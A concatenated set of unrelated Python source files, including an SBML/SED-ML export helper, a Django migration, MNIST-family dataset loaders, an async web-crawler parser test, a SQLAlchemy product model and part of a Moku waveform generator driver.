s = s.replace("roadrunner.RoadRunner()", "te.loada(" + str(modelname)+ ")")
lines[i] = s
if not "import tellurium" in pysedml:
if "import roadrunner" in pysedml:
for i,s in enumerate(lines):
if "import roadrunner" in s:
del lines[i]
lines.insert(i, "import tellurium as te")
else:
pass
pysedml = '\n'.join(lines)
# List of replacements
pysedml = pysedml.replace('"compartment"', '"compartment_"')
pysedml = pysedml.replace("'compartment'", "'compartment_'")
outputstr = str(modelname) + " = '''" + self.antimonyStr + "'''\n\n" + pysedml
os.close(fd1)
os.remove(sedmlfilepath)
return outputstr
def printpython(self):
outputstr = self.createpython()
print outputstr
def exportAsCombine(self, outputpath): # parameter outputpath must be a full path of a zip file you wish to create
# Temporary failsafe - Should be revised once libphrasedml adopts returning of model name
reModel = r"""(\w*) = model ('|")(.*)('|")"""
#rePlot = r"""plot ('|")(.*)('|") (.*)"""
lines = self.phrasedmlStr.splitlines()
for i,s in enumerate(lines):
reSearchModel = re.split(reModel, s)
#reSearchPlot = re.split(rePlot, s)
if len(reSearchModel) > 1:
modelsource = str(reSearchModel[3])
modelname = os.path.basename(modelsource)
if ".xml" or ".sbml" not in modelsource:
modelname = modelname + ".xml"
s = s.replace(modelsource, modelname)
lines[i] = s
#if len(reSearchPlot) > 1:
# plottitle = str(reSearchPlot[2])
revphrasedml = '\n'.join(lines)
phrasedml.setReferencedSBML(modelname, te.antimonyTosbml(self.antimonyStr))
combine.export(outputpath, self.antimonyStr, modelname, revphrasedml)
phrasedml.clearReferencedSBML()
def getAntimonyString(self):
return self.antimonyStr
def getSbmlString(self):
return te.antimonyTosbml(self.antimonyStr)
def getPhrasedmlString(self):
return self.phrasedmlStr
def getSedmlString(self):
reModel = r"""(\w*) = model ('|")(.*)('|")"""
phrasedmllines = self.phrasedmlStr.splitlines()
for i,s in enumerate(phrasedmllines):
reSearchModel = re.split(reModel, s)
if len(reSearchModel) > 1:
modelsource = str(reSearchModel[3])
phrasedml.setReferencedSBML(modelsource, te.antimonyToSbml(self.antimonyStr))
sedmlstr = phrasedml.convertString(self.phrasedmlStr)
if sedmlstr == None:
raise Exception(phrasedml.getLastError())
phrasedml.clearReferencedSBML()
return sedmlstr
|
StarcoderdataPython
|
229130
|
import re
from sublime import Region
class SImport:
@staticmethod
def getExpressionInContext(expression, context):
match = re.search(r"[^\{{\}}\(\)\<\>\.;\s]*{0}$".format(expression), context)
if match:
return match.group(0)
return expression
def __init__(self, expression, context, region, context_region):
self.expression = self.getExpressionInContext(expression, context)
self.region = Region(region.end() - len(self.expression), region.end())
self.context = context
self.context_region = context_region
|
StarcoderdataPython
|
9685931
|
# ------------------------------------------------------------------------------
# Class TextInput
#
# Allows the user to input text (as opposed to predefined options)
# ------------------------------------------------------------------------------
from PythonUtils.user_input import UserInput
from PythonUtils.option import Option
import re
class TextInput(UserInput):
def __init__(self, text, default=None, regex=None):
UserInput.__init__(self, text, default)
if regex:
self.regex = re.compile(regex)
self.help_string = "Input must conform to regex " + regex
else:
self.regex = None
self.help_string = "No input check is made, any is valid"
if default:
self.help_string += "\nThe default value is: " + str(default)
def _help_action(self):
return self.help_string
def get_answer(self):
return self.answer
def _ask(self):
if self.default is None:
user_input = input(self.text + "\n")
else:
user_input = input(self.text + " (default: " + self.default + ")\n")
return_value = self.NOT_SET
for option in self.master_options:
if option == user_input:
return_value = option.return_value
option.run()
if return_value == self.NOT_SET:
if user_input == "":
self.answer = self.default
return_value = self.SUCCESS
else:
if self.regex:
if self.regex.fullmatch(user_input):
return_value = self.SUCCESS
self.answer = user_input
else:
return_value = self.INVALID_INPUT
print(self.help_string)
else:
return_value = self.SUCCESS
self.answer = user_input
return return_value
|
StarcoderdataPython
|
11353339
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-05-09 11:48
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('mapdata', '0065_auto_20170509_1140'),
]
operations = [
migrations.AlterModelOptions(
name='space',
options={'verbose_name': 'Space', 'verbose_name_plural': 'Spaces'},
),
migrations.AddField(
model_name='door',
name='level',
field=models.CharField(choices=[('', 'normal'), ('upper', 'upper'), ('lower', 'lower')], default='', max_length=16, verbose_name='level'),
),
migrations.AlterField(
model_name='space',
name='section',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='spaces', to='mapdata.Section', verbose_name='section'),
),
]
|
StarcoderdataPython
|
4891466
|
from deliravision.data.base_datasets import ImageFolder, Downloadable
import codecs
import gzip
import os
import numpy as np
from PIL import Image
import zipfile
class MNIST(ImageFolder, Downloadable):
"""
The MNIST Dataset
See Also
--------
:class:`deliravision.data.base_datasets.ImageFolder`
the Image Folder, this class is implemented upon.
:class:`deliravision.mnist.KMNIST`
the Kuzushiji-MNIST dataset
:class:`deliravision.mnist.EMNIST`
the extended MNIST dataset
:class:`deliravision.mnist.FashionMNIST`
the FashionMNIST dataset
References
----------
http://yann.lecun.com/exdb/mnist/
"""
def __init__(self, root="/tmp", train=True, download=True, remove=False):
"""
Parameters
----------
root : str
the path, all data should be placed in;
will be created if not yet existing
train : bool
whether to load the trainset or the testset
download : bool
whether to download the dataset; This will be only done, if it
wasn't downlaoded already
remove : bool
whether to remove the downlaoded data after processing it
"""
root = os.path.join(root, self.name)
if train:
root = os.path.join(root, "train")
else:
root = os.path.join(root, "val")
self.train = train
Downloadable.__init__(self, path=root, download=download,
remove=remove)
ImageFolder.__init__(self, path=os.path.join(root, "processed"))
def preprocess_data(self, download_path, prep_path):
"""
Function to preprocess the downloaded data
Parameters
----------
download_path : str
the path containing the downloaded data
prep_path : str
the path the preprocessed data should be stored in
"""
images = None
labels = None
# unzip files
for file in self.urls.values():
_, img_label, _ = file.split("-")
if img_label == "images":
images = self._read_images_from_binary_gzip(
os.path.join(download_path, file))
else:
labels = self._read_labels_from_binary_gzip(
os.path.join(download_path, file))
# check if images and labels have been loaded
assert images is not None and labels is not None
self._to_image_folder(images, labels, prep_path)
def _to_image_folder(self, images, labels, prep_path):
"""
Helper Function, which writes the given images and labels to the given
path in a way, they can be read by the
:class:`deliravision.data.base_datasets.ImageFolder` class
Parameters
----------
images : :class:`numpy.ndarray`
the array containing the images
labels : :class:`numpy.ndarray`
the array containing the labels
prep_path : str
the path which will contain the preprocessed data after
dumping the images
"""
# counter for each class
label_idxs = {}
for img, label in zip(images, labels):
label = int(label)
label = self.class_names[label]
# set counter for class to zero and create dir for class if first
# item of this class
if label not in label_idxs:
label_idxs[label] = 0
os.makedirs(os.path.join(prep_path, label))
# write image to disk and increase counter
Image.fromarray(img).save(os.path.join(prep_path, label, "%05d.png"
% label_idxs[label]))
label_idxs[label] += 1
@staticmethod
def _get_int_from_hex(b):
"""
Helper function to decode an integer from a binary hexfile
Parameters
----------
b :
binary buffer
Returns
-------
int
integer value decoded from given buffer
"""
return int(codecs.encode(b, 'hex'), 16)
def _read_images_from_binary_gzip(self, path):
"""
Reads images from a binary gzip data file
Parameters
----------
path : str
path to that datafile
Returns
-------
:class:`numpy.ndarray`
the loaded images
"""
# open file and read data
with gzip.open(path, "rb") as f:
data = f.read()
assert self._get_int_from_hex(data[:4]) == 2051
# get number of items, rows and columns
length = self._get_int_from_hex(data[4:8])
num_rows = self._get_int_from_hex(data[8:12])
num_cols = self._get_int_from_hex(data[12:16])
# load from buffer with numpy
parsed = np.frombuffer(data, dtype=np.uint8, offset=16)
return parsed.view(length, num_rows, num_cols)
def _read_labels_from_binary_gzip(self, path):
"""
Reads labels from a binary gzip data file
Parameters
----------
path : str
path to that datafile
Returns
-------
:class:`numpy.ndarray`
the loaded labels
"""
# open file and read data
with gzip.open(path, 'rb') as f:
data = f.read()
assert self._get_int_from_hex(data[:4]) == 2049
# get number of items
length = self._get_int_from_hex(data[4:8])
# read from buffer with numpy
parsed = np.frombuffer(data, dtype=np.uint8, offset=8)
return parsed.view(length)
@property
def urls(self):
"""
Property returning the urls of the current mode
Returns
-------
dict
dictionary containing either the train or test urls
"""
if self.train:
return {
"http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz":
"train-images-idx3-ubyte.gz",
"http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz":
"train-labels-idx1-ubyte.gz"
}
return {
"http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz":
"t10k-images-idx3-ubyte.gz",
"http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz":
"t10k-labels-idx1-ubyte.gz"
}
@property
def name(self):
"""
Property returning the Datasets name to make the class reusable
Returns
-------
str
the name
"""
return "MNIST"
@property
def class_names(self):
return ("zero", "one", "two", "three", "four", "five", "six", "seven",
"eight", "nine")
class FashionMNIST(MNIST):
"""
The Fashion-MNIST Dataset
See Also
--------
:class:`deliravision.data.base_datasets.ImageFolder`
the Image Folder, this class is implemented upon.
:class:`deliravision.data.mnist.MNIST`
the original MNIST dataset
:class:`deliravision.mnist.KMNIST`
the Kuzushiji-MNIST dataset
:class:`deliravision.mnist.EMNIST`
the extended MNIST dataset
References
----------
https://github.com/zalandoresearch/fashion-mnist
"""
@property
def name(self):
"""
Property returning the Datasets name
Returns
-------
str
the name
"""
return "FashionMNIST"
@property
def urls(self):
"""
Property returning the urls of the current mode
Returns
-------
dict
dictionary containing either the train or test urls
"""
if self.train:
return {
"http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/"
"train-images-idx3-ubyte.gz":
"train-images-idx3-ubyte.gz",
"http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/"
"train-labels-idx1-ubyte.gz":
"train-labels-idx1-ubyte.gz"
}
return {
"http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/"
"t10k-images-idx3-ubyte.gz":
"t10k-images-idx3-ubyte.gz",
"http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/"
"t10k-labels-idx1-ubyte.gz":
"t10k-labels-idx1-ubyte.gz"
}
@property
def class_names(self):
return ("tshirt", "trouser", "pullover", "dress", "coat", "sandal",
"shirt", "sneaker", "bag", "ankle_boot")
class KMNIST(MNIST):
"""
The Kuzushiji-MNIST Dataset
See Also
--------
:class:`deliravision.data.base_datasets.ImageFolder`
the Image Folder, this class is implemented upon.
:class:`deliravision.data.mnist.MNIST`
the original MNIST dataset
:class:`deliravision.mnist.FashionMNIST`
the FashionMNIST dataset
:class:`deliravision.mnist.EMNIST`
the extended MNIST dataset
References
----------
https://github.com/rois-codh/kmnist
"""
@property
def name(self):
"""
Property returning the Datasets name
Returns
-------
str
the name
"""
return "KMNIST"
@property
def urls(self):
"""
Property returning the urls of the current mode
Returns
-------
dict
dictionary containing either the train or test urls
"""
if self.train:
return {
"http://codh.rois.ac.jp/kmnist/dataset/kmnist/"
"train-images-idx3-ubyte.gz":
"train-images-idx3-ubyte.gz",
"http://codh.rois.ac.jp/kmnist/dataset/kmnist/"
"train-labels-idx1-ubyte.gz":
"train-labels-idx1-ubyte.gz"
}
return {
"http://codh.rois.ac.jp/kmnist/dataset/kmnist/"
"t10k-images-idx3-ubyte.gz":
"t10k-images-idx3-ubyte.gz",
"http://codh.rois.ac.jp/kmnist/dataset/kmnist/"
"t10k-labels-idx1-ubyte.gz":
"t10k-labels-idx1-ubyte.gz"
}
@property
def class_names(self):
return tuple(str(i) for i in range(10))
class EMNIST(MNIST):
"""
The Extended-MNIST Dataset
See Also
--------
:class:`deliravision.data.base_datasets.ImageFolder`
the Image Folder, this class is implemented upon.
:class:`deliravision.data.mnist.MNIST`
the original MNIST dataset
:class:`deliravision.mnist.FashionMNIST`
the FashionMNIST dataset
:class:`deliravision.mnist.KMNIST`
the Kuzushiji-MNIST dataset
References
----------
https://www.westernsydney.edu.au/bens/home/reproducible_research/emnist
"""
def __init__(self, root="/tmp", train=True, split="balanced",
download=True, remove=False):
assert split in ('balanced', 'byclass', 'bymerge', 'digits', 'letters',
'mnist')
self.split = split
self.train = train
root = os.path.join(root, self.name)
Downloadable.__init__(self, path=root, download=download,
remove=remove)
ImageFolder.__init__(
self, os.path.join(root, split, "train" if train else "test"))
@property
def name(self):
"""
Property returning the Datasets name
Returns
-------
str
the name
"""
return "EMNIST"
@property
def urls(self):
"""
Property returning the urls of the current mode
Returns
-------
dict
dictionary containing either the train or test urls
"""
return {"https://cloudstor.aarnet.edu.au/plus/index.php/s/"
"54h3OuGJhFLwAlQ/download": "emnist_full.zip"}
def preprocess_data(self, download_path, prep_path):
"""
Function to preprocess the downloaded data
Parameters
----------
download_path : str
the path containing the downloaded data
prep_path : str
the path the preprocessed data should be stored in
"""
fname = list(self.urls.values())[0]
with zipfile.ZipFile(os.path.join(download_path, fname)) as f:
f.extractall(download_path)
download_path = os.path.join(download_path, "gzip")
split_files = {k: os.path.join(download_path, v)
for k, v in self._split_files.items()}
images = self._read_images_from_binary_gzip(split_files["images"])
labels = self._read_labels_from_binary_gzip(split_files["labels"])
train_str = "train" if self.train else "test"
self._to_image_folder(images, labels, os.path.join(prep_path,
self.split,
train_str))
@property
def _split_files(self):
"""
Property returning the files in the archive for the current split and
train mode
Returns
-------
dict
dictionary containing the filenames for the images and labels file
"""
train_str = "train" if self.train else "test"
return {"images": "emnist-%s-%s_images-idx3-ubtyte.gz"
% (self.split, train_str),
"labels": "emnist-%s-%s-labels-idx1-ubyte.gz"
% (self.split, train_str)}
@property
def class_names(self):
uppercase = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K",
"L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V",
"W", "X", "Y", "Z"]
digits = [str(i) for i in range(10)]
lowercase = [i.lowercase() for i in uppercase]
merged = (digits + uppercase + ["a", "b", "d", "e", "f", "g",
"h", "n", "q", "r", "t"])
cls_names = {
"mnist": digits,
"balanced": merged,
"bymerge": merged,
"byclass": digits + uppercase + lowercase,
"digits": digits,
"letters": uppercase
}
return cls_names[self.split]
|
StarcoderdataPython
|
1914107
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Vincent<<EMAIL>>
# http://blog.vincentzhong.cn
# Created on 2017/2/26 19:57
# !/usr/bin/env python
import asynctest
from catty.message_queue import AsyncRedisPriorityQueue
from catty.parser import Parser
from catty import DOWNLOADER_PARSER, PARSER_SCHEDULER
import catty.config
import asyncio
class TestParser(asynctest.TestCase):
use_default_loop = True
@classmethod
def setUpClass(cls):
from catty.libs.tasker import Tasker
from tests.spider.mock_spider import Spider
cls.downloader_parser_queue = AsyncRedisPriorityQueue('MySpider:DP', loop=cls.loop)
cls.parser_scheduler_queue = AsyncRedisPriorityQueue('MySpider:PS', loop=cls.loop)
cls.parser = Parser(
cls.downloader_parser_queue,
cls.parser_scheduler_queue,
cls.loop
)
myspider = Spider()
tasker = Tasker()
cls.parser.spider_started.add(myspider.name)
cls.task = tasker.make_task(myspider.start())
cls.mock_response_task = tasker.make_task(myspider.start())
cls.mock_response_task['response'] = {'body': 'this is a mock response', 'status': 200}
async def setUp(self):
self.parser.loop = self.loop
await self.downloader_parser_queue.conn()
await self.parser_scheduler_queue.conn()
async def tearDown(self):
pass
async def test_run_ins_func(self):
await self.parser._run_ins_func('mock_spider', 'mock_parser_with_response', self.mock_response_task)
t1 = await self.parser.parser_scheduler_queue.get()
self.assertAlmostEqual(self.mock_response_task, t1)
async def test_make_tasks_return_dict(self):
await self.downloader_parser_queue.put(self.mock_response_task)
# -----------------test-------------------
await self.parser.make_tasks()
await asyncio.sleep(0.5, self.loop)
t1 = await self.parser.parser_scheduler_queue.get()
self.assertAlmostEqual(self.mock_response_task, t1)
async def test_dump_load_tasks(self):
import os
await self.downloader_parser_queue.put(self.mock_response_task)
await self.parser_scheduler_queue.put(self.mock_response_task)
await self.parser.dump_tasks(DOWNLOADER_PARSER)
await self.parser.dump_tasks(PARSER_SCHEDULER)
await asyncio.sleep(0.5, loop=self.loop)
self.assertTrue(os.path.exists(os.path.join(
os.path.join(catty.config.PERSISTENCE['DUMP_PATH'], '{}_{}'.format(self.parser.name, DOWNLOADER_PARSER)),
self.mock_response_task['spider_name'])))
self.assertTrue(os.path.exists(os.path.join(
os.path.join(catty.config.PERSISTENCE['DUMP_PATH'], '{}_{}'.format(self.parser.name, PARSER_SCHEDULER)),
self.mock_response_task['spider_name'])))
await self.parser.load_tasks(DOWNLOADER_PARSER, self.mock_response_task['spider_name'])
await self.parser.load_tasks(PARSER_SCHEDULER, self.mock_response_task['spider_name'])
downloader_parser_task = await self.downloader_parser_queue.get()
parser_scheduler_task = await self.parser_scheduler_queue.get()
self.assertAlmostEqual(self.mock_response_task, downloader_parser_task)
self.assertAlmostEqual(self.mock_response_task, parser_scheduler_task)
if __name__ == '__main__':
pass
|
StarcoderdataPython
|
370935
|
<gh_stars>1-10
from sql_alchemy import db
from models.fornecedor_model import FornecedorModel
from models.categoria_model import CategoriaModel
class ProdutoModel(db.Model):
__tablename__ = 'produto'
id_produto = db.Column(db.Integer, primary_key=True)
cod_produto = db.Column(db.String(50), nullable=False)
nome_produto = db.Column(db.String(150), nullable=False)
valor_produto = db.Column(db.Float(precision=2), nullable=False)
ativo = db.Column(db.String(3), nullable=False)
cod_categoria = db.Column(
db.Integer, db.ForeignKey('categoria.cod_categoria'))
cod_fornecedor = db.Column(
db.Integer, db.ForeignKey('fornecedor.cod_fornecedor'))
def __init__(self, cod_produto, nome_produto,
valor_produto, ativo, cod_categoria, cod_fornecedor):
self.cod_produto = cod_produto
self.nome_produto = nome_produto
self.valor_produto = valor_produto
self.ativo = ativo
self.cod_categoria = cod_categoria
self.cod_fornecedor = cod_fornecedor
def getCodProduto(self):
return self.cod_produto
def json(self):
return {
'id_produto': self.id_produto,
'cod_produto': self.cod_produto,
'nome_produto': self.nome_produto,
'valor_produto': self.valor_produto,
'ativo': self.ativo,
'cod_categoria': self.cod_categoria,
'cod_fornecedor': self.cod_fornecedor
}
@classmethod
def find_produto_by_cod(cls, cod_produto):
produto = cls.query.filter_by(cod_produto=cod_produto).first()
if produto:
return produto
return None
@classmethod
def find_produto(cls, id_produto):
produto = cls.query.filter_by(id_produto=id_produto).first()
if produto:
return produto
return None
@classmethod
def find_produto_categoria(cls, cod_fornecedor):
produto = cls.query.filter_by(cod_fornecedor=cod_fornecedor).first()
if produto:
return produto
return None
@classmethod
def find_produto_fornecedor(cls, cod_categoria):
produto = cls.query.filter_by(cod_categoria=cod_categoria).first()
if produto:
return produto
return None
def save_produto(self):
db.session.add(self)
db.session.commit()
def update_produto(self, id_produto, cod_produto, nome_produto,
valor_produto, ativo, cod_categoria, cod_fornecedor):
self.id_produto = id_produto
self.cod_produto = cod_produto
self.nome_produto = nome_produto
self.valor_produto = valor_produto
self.ativo = ativo
self.cod_categoria = cod_categoria
self.cod_fornecedor = cod_fornecedor
def delete_produto(self):
db.session.delete(self)
db.session.commit()
def __json_categoria(self, cod_categoria):
categoria = CategoriaModel.find_categoria(cod_categoria)
return categoria.json()
def __json_fornecedor(self, cod_fornecedor):
fornecedor = FornecedorModel.find_fornecedor(cod_fornecedor)
return fornecedor.json()
|
StarcoderdataPython
|
3402770
|
import math
import logging
from ._instrument import *
from ._instrument import _usgn, _sgn
from . import _utils
log = logging.getLogger(__name__)
REG_SG_TrigDutyInternalCH0_L = 69
REG_SG_TrigDutyInternalCH0_H = 70
REG_SG_TrigDutyInternalCH1_L = 71
REG_SG_TrigDutyInternalCH1_H = 72
REG_SG_TrigPeriodInternalCH0_L = 73
REG_SG_TrigPeriodInternalCH0_H = 74
REG_SG_TrigPeriodInternalCH1_L = 75
REG_SG_TrigPeriodInternalCH1_H = 76
REG_SG_ADCThreshold = 77
REG_SG_DACThreshold = 78
REG_SG_NCycles_TrigDutyCH0_L = 79
REG_SG_NCycles_TrigDutyCH0_H = 80
REG_SG_NCycles_TrigDutyCH1_L = 81
REG_SG_NCycles_TrigDutyCH1_H = 82
REG_SG_TrigSweepMode = 83
REG_SG_SweepLengthCh0_L = 84
REG_SG_SweepLengthCh0_H = 85
REG_SG_SweepLengthCh1_L = 86
REG_SG_SweepLengthCh1_H = 87
REG_SG_SweepInitFreqCh0_L = 88
REG_SG_SweepInitFreqCh0_H = 89
REG_SG_SweepInitFreqCh1_L = 90
REG_SG_SweepInitFreqCh1_H = 91
REG_SG_SweepIncrementCh0_L = 92
REG_SG_SweepIncrementCh0_H = 93
REG_SG_SweepIncrementCh1_L = 94
REG_SG_SweepIncrementCh1_H = 95
REG_SG_WAVEFORMS = 96
REG_SG_MODSOURCE = 123
REG_SG_PRECLIP = 124
REG_SG_FREQ1_L = 97
REG_SG_FREQ1_H = 105
REG_SG_PHASE1 = 98
REG_SG_AMP1 = 99
REG_SG_MODF1_L = 100
REG_SG_MODF1_H = 101
REG_SG_T01 = 102
REG_SG_T11 = 103
REG_SG_T21 = 104
REG_SG_RISERATE1_L = 106
REG_SG_FALLRATE1_L = 107
REG_SG_RFRATE1_H = 108
REG_SG_MODA1 = 121
REG_SG_FREQ2_L = 109
REG_SG_FREQ2_H = 117
REG_SG_PHASE2 = 110
REG_SG_AMP2 = 111
REG_SG_MODF2_L = 112
REG_SG_MODF2_H = 113
REG_SG_T02 = 114
REG_SG_T12 = 115
REG_SG_T22 = 116
REG_SG_RISERATE2_L = 118
REG_SG_FALLRATE2_L = 119
REG_SG_RFRATE2_H = 120
REG_SG_MODA2 = 122
_SG_WAVE_SINE = 0
_SG_WAVE_SQUARE = 1
_SG_WAVE_TRIANGLE = 2
_SG_WAVE_PULSE = 3
_SG_WAVE_DC = 4
_SG_MOD_NONE = 0
_SG_MOD_AMPL = 1
_SG_MOD_FREQ = 2
_SG_MOD_PHASE = 4
_SG_MODSOURCE_INT = 0
_SG_MODSOURCE_ADC = 1
_SG_MODSOURCE_DAC = 2
_SG_FREQSCALE = 1e9 / 2**48
_SG_PHASESCALE = 360.0 / (2**32) # Wraps
_SG_RISESCALE = 1e9 / 2**48
_SG_AMPSCALE = 4.0 / (2**15 - 1)
_SG_DEPTHSCALE = 1.0 / 2**15
_SG_MAX_RISE = 1e9 - 1
_SG_TIMESCALE = 1.0 / (2**32 - 1) # Doesn't wrap
_SG_MOD_FREQ_MAX = 62.5e6 # Hz
_SG_SQUARE_CLIPSINE_THRESH = 25e3 # Hz
_SG_TRIG_EXT = 0
_SG_TRIG_ADC = 1
_SG_TRIG_DAC = 2
_SG_TRIG_INTER = 3
_SG_TRIG_MODE_OFF = 0
_SG_TRIG_MODE_GATE = 1
_SG_TRIG_MODE_START = 2
_SG_TRIG_MODE_NCYCLE= 3
_SG_TRIG_MODE_SWEEP = 4
_SG_TRIGLVL_ADC_MAX = 5.0 # V
_SG_TRIGLVL_ADC_MIN = -5.0 # V
_SG_TRIGLVL_DAC_MAX = 1.0 # V
_SG_TRIGLVL_DAC_MIN = -1.0 # V
class BasicWaveformGenerator(MokuInstrument):
"""
.. automethod:: pymoku.instruments.WaveformGenerator.__init__
"""
def __init__(self):
""" Create a new WaveformGenerator instance, ready to be attached to a Moku."""
super(BasicWaveformGenerator, self).__init__()
self._register_accessors(_siggen_reg_handlers)
self.id = 4
self.type = "signal_generator"
@needs_commit
def set_defaults(self):
super(BasicWaveformGenerator, self).set_defaults()
self.out1_enable = True
self.out2_enable = True
self.out1_amplitude = 0
self.out2_amplitude = 0
self.out1_frequency = 0
self.out2_frequency = 0
self.adc1_statuslight = False
self.adc2_statuslight = False
# Burst/sweep mode exception variables:
self.ch1_is_ramp = False
self.ch2_is_ramp = False
self.ch1_edgetime_nonzero = False
self.ch2_edgetime_nonzero = False
# Disable inputs on hardware that supports it
self.en_in_ch1 = True
self.en_in_ch2 = True
self.trig_sweep_mode_ch1 = _SG_TRIG_MODE_OFF
self.trig_sweep_mode_ch2 = _SG_TRIG_MODE_OFF
# Configure front end:
self._set_frontend(channel = 1, fiftyr=True, atten=True, ac=False)
self._set_frontend(channel = 2, fiftyr=True, atten=True, ac=False)
@needs_commit
def gen_sinewave(self, ch, amplitude, frequency, offset=0, phase=0.0):
""" Generate a Sine Wave with the given parameters on the given channel.
:type ch: int; {1,2}
:param ch: Channel on which to generate the wave
:type amplitude: float, [0.0,2.0] Vpp
:param amplitude: Waveform peak-to-peak amplitude
:type frequency: float, [0,250e6] Hz
:param frequency: Frequency of the wave
:type offset: float, [-1.0,1.0] Volts
:param offset: DC offset applied to the waveform
:type phase: float, [0-360] degrees
:param phase: Phase offset of the wave
:raises ValueError: if the channel number is invalid
:raises ValueOutOfRangeException: if wave parameters are out of range
"""
_utils.check_parameter_valid('set', ch, [1,2],'output channel')
_utils.check_parameter_valid('range', amplitude, [0.0, 2.0],'sinewave amplitude','Volts')
_utils.check_parameter_valid('range', frequency, [0,250e6],'sinewave frequency', 'Hz')
_utils.check_parameter_valid('range', phase, [0,360], 'sinewave phase', 'degrees')
# Ensure offset does not cause signal to exceed allowable 2.0Vpp range
upper_voltage = offset + (amplitude/2.0)
lower_voltage = offset - (amplitude/2.0)
if (upper_voltage > 1.0) or (lower_voltage < -1.0):
raise ValueOutOfRangeException("Sinewave offset limited by amplitude (max output range 2.0Vpp).")
if ch == 1:
self.dac = False
self.out1_waveform = _SG_WAVE_SINE
self.out1_enable = True
self.out1_amplitude = amplitude
self.out1_frequency = frequency
self.out1_offset = offset
self.out1_phase = phase
elif ch == 2:
self.ch2_is_ramp = False
self.out2_waveform = _SG_WAVE_SINE
self.out2_enable = True
self.out2_amplitude = amplitude
self.out2_frequency = frequency
self.out2_offset = offset
self.out2_phase = phase
@needs_commit
def gen_squarewave(self, ch, amplitude, frequency, offset=0, duty=0.5, risetime=0, falltime=0, phase=0.0):
""" Generate a Square Wave with given parameters on the given channel.
:type ch: int; {1,2}
:param ch: Channel on which to generate the wave
:type amplitude: float, volts
:param amplitude: Waveform peak-to-peak amplitude
:type frequency: float, hertz
:param frequency: Frequency of the wave
:type offset: float, volts
:param offset: DC offset applied to the waveform
:type duty: float, 0-1
:param duty: Fractional duty cycle
:type risetime: float, 0-1
:param risetime: Fraction of a cycle taken for the waveform to rise
:type falltime: float 0-1
:param falltime: Fraction of a cycle taken for the waveform to fall
:type phase: float, degrees 0-360
:param phase: Phase offset of the wave
:raises ValueError: invalid channel number
:raises ValueOutOfRangeException: input parameters out of range or incompatible with one another
"""
_utils.check_parameter_valid('set', ch, [1,2],'output channel')
_utils.check_parameter_valid('range', amplitude, [0.0, 2.0],'squarewave amplitude','Volts')
_utils.check_parameter_valid('range', frequency, [0,100e6],'squarewave frequency', 'Hz')
_utils.check_parameter_valid('range', offset, [-1.0,1.0], 'squarewave offset', 'cycles')
_utils.check_parameter_valid('range', duty, [0,1.0], 'squarewave duty', 'cycles')
_utils.check_parameter_valid('range', risetime, [0,1.0], 'squarewave risetime', 'cycles')
_utils.check_parameter_valid('range', falltime, [0,1.0], 'squarewave falltime', 'cycles')
_utils.check_parameter_valid('range', phase, [0,360], 'squarewave phase', 'degrees')
# Ensure offset does not cause signal to exceed allowable 2.0Vpp range
upper_voltage = offset + (amplitude/2.0)
lower_voltage = offset - (amplitude/2.0)
if (upper_voltage > 1.0) or (lower_voltage < -1.0):
raise ValueOutOfRangeException("Squarewave offset limited by amplitude (max output range 2.0Vpp).")
if duty < risetime:
raise ValueOutOfRangeException("Squarewave duty too small for given rise time.")
elif duty + falltime > 1:
raise ValueOutOfRangeException("Squarewave duty and fall time too big.")
# Check rise/fall times are within allowable DAC frequency
# TODO: Implement clipped sine squarewave above threshold
if frequency > _SG_SQUARE_CLIPSINE_THRESH:
log.warning("Squarewave may experience edge jitter above %d kHz.", _SG_SQUARE_CLIPSINE_THRESH/1e3)
riserate = frequency / risetime if risetime else _SG_MAX_RISE
fallrate = frequency / falltime if falltime else _SG_MAX_RISE
# Raise warning if calculated rise/fall rate is > max rise/fall rate. Set values to max if this occurs.
if riserate > _SG_MAX_RISE:
riserate = _SG_MAX_RISE
log.warning("Riserate restricted to maximum value of %d s.",_SG_MAX_RISE)
if fallrate > _SG_MAX_RISE:
fallrate = _SG_MAX_RISE
log.warning("Fallrate restricted to maximum value of %d s.",_SG_MAX_RISE)
if ch == 1:
self.out1_waveform = _SG_WAVE_SQUARE
self.out1_enable = True
self.out1_amplitude = amplitude
self.out1_frequency = frequency
self.out1_offset = offset
self.out1_clipsine = False # TODO: Should switch to clip depending on freq or user
# This is overdefined, but saves the FPGA doing a tricky division
self.out1_t0 = risetime
self.out1_t1 = duty
self.out1_t2 = duty + falltime
self.out1_riserate = riserate
self.out1_fallrate = fallrate
self.out1_phase = phase
# Parameters used to determine burst/sweep mode exception cases:
self.ch1_edgetime_nonzero = True if (risetime != 0 or falltime != 0) else False
self.dac = False
elif ch == 2:
self.out2_waveform = _SG_WAVE_SQUARE
self.out2_enable = True
self.out2_amplitude = amplitude
self.out2_frequency = frequency
self.out2_offset = offset
self.out2_clipsine = False
self.out2_t0 = risetime
self.out2_t1 = duty
self.out2_t2 = duty + falltime
self.out2_riserate = frequency / risetime if risetime else _SG_MAX_RISE
self.out2_fallrate = frequency / falltime if falltime else _SG_MAX_RISE
self.out2_phase = phase
self.ch2_edgetime_nonzero = 1 if (risetime != 0 or falltime != 0) else 0
self.ch2_is_ramp = False
@needs_commit
def gen_rampwave(self, ch, amplitude, frequency, offset=0, symmetry=0.5, phase= 0.0):
""" Generate a Ramp with the given parameters on the given channel.
This is a wrapper around the Square Wave generator, using the *riserate* and *fallrate*
parameters to form the ramp.
:type ch: int; {1,2}
:param ch: Channel on which to generate the wave
:type amplitude: float, volts
:param amplitude: Waveform peak-to-peak amplitude
:type frequency: float, hertz
:param frequency: Frequency of the wave
:type offset: float, volts
:param offset: DC offset applied to the waveform
:type symmetry: float, 0-1
:param symmetry: Fraction of the cycle rising.
